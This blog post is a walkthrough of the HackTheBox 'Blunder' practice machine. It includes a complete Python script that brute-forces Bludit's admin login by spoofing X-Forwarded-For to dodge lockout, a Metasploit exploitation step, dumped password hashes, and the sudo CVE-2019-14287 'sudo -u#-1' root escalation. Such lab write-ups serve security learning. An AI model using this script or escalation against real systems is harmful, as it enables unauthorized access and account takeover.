HackTheBox Blunder Writeup – 10.10.10.191

Machine Name: BLUNDER

OS: LINUX

Points: 20

Difficulty: Easy

Maker: egotisticalSW

HackTheBox Blunder – 10.10.10.191 is an easy rated straightforward Linux box that doesn’t need much hard work to get root. I used the known exploit of CMS Bludit in Matasploit (CVE-201916113) to get the reverse shell as www-data and a few minutes of enumeration got me a couple of PHP files those contain hashed password of 3 users. Cracking them and getting one right password got me the user. After getting the user I found out the well-known Sudo bug CVE-2019-14287 applies here which got me the root from user in matter of seconds.

Enumeration

From NMAP scan I got to know that port 80 is the only port open and the FTP port 21 is closed.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-01 17:19 +03
Discovered open port 80/tcp on 10.10.10.191
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA
|_http-generator: Blunder
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 2.6.32 (90%), Linux 2.6.32 - 3.1 (90%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (90%), Linux 3.7 (90%), Linux 2.6.32 - 3.13 (89%), Linux 3.0 - 3.2 (89%), Linux 3.3 (89%), Infomir MAG-250 set-top box (89%), Ubiquiti AirOS 5.5.9 (89%)

The web server on port 80 hosts a website named “A Blunder of Interesting Facts”. Other than that I couldn’t find anything interesting.

When there is a web server is involved and no other services can be seen, the next thing to do is fuzzing. As I’m unsure about the version of the CMS being used, I added the payloads of PHP, TXT and HTML so the fuzzer can get me anything that has these extensions on its way.

The fuzzer got me 3 results:

On checking install.php, I got to know the CMS installed is Bludit, and todo.txt has lists of tasks being carried on.

Finding Exploits

As I already know the CMS being used, I tried to find exploits using searchsploit and these two were in the database.

The exploit Directory Traversal attack seemed to be working, but upon checking the exploit needs credential to exploit, well that is what I don’t have.

An HTB user indicated that the username is in front of us, just an enumeration is what is needed. So I thought the user should be either in the blog or the name mentioned in the to-do. Also, reading further I understood how to get the user and his credentials.

Once the CMS confirmed, I found the login page to brute force resides in this link, http://[url]/admin/ as per an article in the Bludit support forum.

In few seconds I was ready with user and ready to grab possible password by creating my own list. I recently used a tool called CeWL . A great tool that spiders given url/ link page/ and gathers a number of words and make it a list as per the given name.

I made a list using the default settings that crawls default dept of 2 and minimum word length of 3.

cewl -w list.txt http://blunder.htb 

Bruteforcing Using Burp suit Intruder

CeWL returned with around 329 possible words. My next approach was to crack using burp suit if I’ll be able to use the passwords from the list.

Target:

Well, unfortunately that attempt failed, the burp exhausted whole wordlist but no changes in the status. This made me think there should be another way to confirm the passwords, I can see people talking about such tool.

I found the tool after a couple of minutes of intense Google search.

Tool link:

https://rastating.github.io/bludit-brute-force-mitigation-bypass/

As per the author the tool takes word lists and executes a time controlled brute force attack and confirms if the password in the wordlist matches. I immediately copied the code and run it to see how it works. The Python PoC the author published only able to run auto-generated password like this:

In-order to make it work I need to modify the code, so I could amend my wordlist as well as the code read each line. I tried several possible ways, but I was failing each time. I know that the Python readlines() method actually works here. After several minutes of trail and error my final code is ready.

#!/usr/bin/env python3
import re
import requests
from termcolor import colored
def wordlist_link(creds): return[each_line.replace("\n",'') for each_line in open(creds).readlines()]
host = 'http://blunder.htb'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = wordlist_link('list.txt')
print('\n \x1b[6;30;42m' + 'Bruteforcing the password, please standby' + '\x1b[0m \n')
'''# Generate 50 incorrect passwords
for i in range(50):
    wordlist.append('Password{i}'.format(i = i))
# Add the correct password to the end of the list
wordlist.append('adminadmin')
'''
for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
    print('[*] Bruteforcing fergus:{p}'.format(p = password))
    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }
    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }
    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break

And running the script for few seconds, the script successfully found the password.

I opened the metasploit and the exploit I selected earlier set the user as “fergus” and the password as the password I just found.

Metasploit successfully executed the payload using the credentials and I have the meterpreter session opened.

And from meterpreter session to spawn the cooler tty using

python3 -c 'import pty; pty.spawn("/bin/bash")'

And here I have the proper tty

So now I have the stable session as www-data and it’s time to enum and get the user.

Getting User.txt

I wanted to see if I could find config file in the installation directory that possibly give me privesc as user. But I was not able to find a config file instead I found two versions of bludit installations. Upon checking each one of them, I found a php file in the directory database /bludit-xxxxxxx/bl-content/databases/ that contained three hashed passwords for the user Admin, Hugo and fergus.

  • bfcc887f62e36ea019e3295aafb8a3885966e265 – Admin
  • be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7 – Fergus
  • faca404fd5c0a31cf1897b823c695c85cffeb98d – Hugo

I used hashcat and online cracker both to crack the hashes, but Hashcat was aborting but online cracker craced one of the hashes successfully.

The cracked hash is for the user Hugo who is an administrator.

Knowing the password of user Hugo, I switched to him and successfully logged-in as Hugo.

The user.txt was found in the Hugo’s home directory and I grabbed it immediately,

Privilege Escalation

Running sudo -l shows the user Hugo can run /bin/bash as ALL, but not Root. Also, checking the sudo version I found that the current version 1.8.2xxx is known for CVE-2019-14287 vulnerability.

Sudo version 1.8.25p1

The exploit is; A specific configuration in the Sudo security policy, called “sudoers”, which helps to ensure that the user privileges are limited only to specific users. The issue occurs when a sysadmin inserts an entry into the sudoers file, for example:

jacob myhost = (ALL, !root) /usr/bin/chmod

This means that user jacob is allowed to run “chmod” as any user except the root user, meaning a security policy is in place in order to limit access, but this can be exploited easily when giving the parameter user id “-1” or its unsigned number “4294967295”, the command will run as root, bypassing the security policy entry we set in the example above. 

Getting Root.txt

In our case our use Hudo is able to run /bin/bash/ as everyone except root.

Using the above example I run the sudo -u#-1 /bin/bash and got myself privesc as root.

That’s it, this is how the Blunder box was rooted. The user part was a bit tricky but after knowing the Sudo version it takes hardy seconds to root, I’m not sure this is how it supposed to be.

Thank you.

References:

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

You may also like...

Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments
Sorry, that action is blocked.